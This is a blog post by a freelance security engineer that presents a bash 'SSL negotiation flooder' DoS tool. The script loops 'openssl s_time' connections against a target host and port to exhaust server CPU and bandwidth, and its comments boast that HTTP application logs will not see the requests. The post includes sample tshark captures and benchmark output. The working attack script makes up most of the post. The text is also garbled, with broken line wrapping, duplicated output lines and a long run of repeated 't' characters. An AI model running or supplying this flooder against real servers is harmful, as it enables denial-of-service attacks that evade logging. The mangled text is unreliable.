We will re-look at another simple ssl negotiation flooder
script that uses openssl.
In this approach we
repetitively ask for the ssl handshake & negotiation. This repetitive requests, will raise the CPU and
bandwidth for the delivery of the cert and
session setup.
Here’s the script;
#!/bin/bash
#
#
#rev 1.0
# ssl negotiation generation & flooding via openssl and
s_time
#
# SSL neg flooder
DoStool
# Basically this
tool loops the ssl neg and request no
HTTP traffic from the host,
# so any HTTP
application logs will not see any requests or L7 attacks
#
#
if [ ! $1 ]; then
echo "
Usage : $0 < The #of requests to
execute> <server or ip_address>
<port> "
echo
""
echo
"Example $0 10 1.1.1.1 443 "
echo
""
exit 1
fi
#
i="0"
#
###set -xv
COUNTER=$1
MAX=9999999
if (( $1 >= $MAX ))
; then
echo
" "
echo
"Please make a request range of $MAX
or less"
echo
" "
else
while [ $i -lt $COUNTER ] ;
do openssl s_time -connect $2:$3 -time 200 -nbio
-new
echo " "
echo " Request #
$i "
echo " "
i=$[$i + 1]
# let "COUNTER
+= 1"
#
done
fi
And here's what tshark will decode;
( output shorten )
2013-05-23 16:05:20.912039 127.0.0.1 -> 127.0.0.1 TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
2013-05-23 16:05:20.913222 127.0.0.1 -> 127.0.0.1 TLSv1 190 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.913813 127.0.0.1 -> 127.0.0.1 TLSv1 115 Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.915249 127.0.0.1 -> 127.0.0.1 TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
1806 packets captured
2013-05-23 16:05:20.913222 127.0.0.1 -> 127.0.0.1 TLSv1 190 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.913813 127.0.0.1 -> 127.0.0.1 TLSv1 115 Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.915249 127.0.0.1 -> 127.0.0.1 TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
1806 packets captured
And at the conclusion of each request, we will get some benchmark numbers;
(output shorten)
ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt
55699 connections in 68.99s; 807.35 connections/user sec, bytes read 0
55699 connections in 201 real seconds, 0 bytes read per connection
Request # 0
55699 connections in 68.99s; 807.35 connections/user sec, bytes read 0
55699 connections in 201 real seconds, 0 bytes read per connection
Request # 0
Ken Felix
Freelance Network/Security Engineer
No comments:
Post a Comment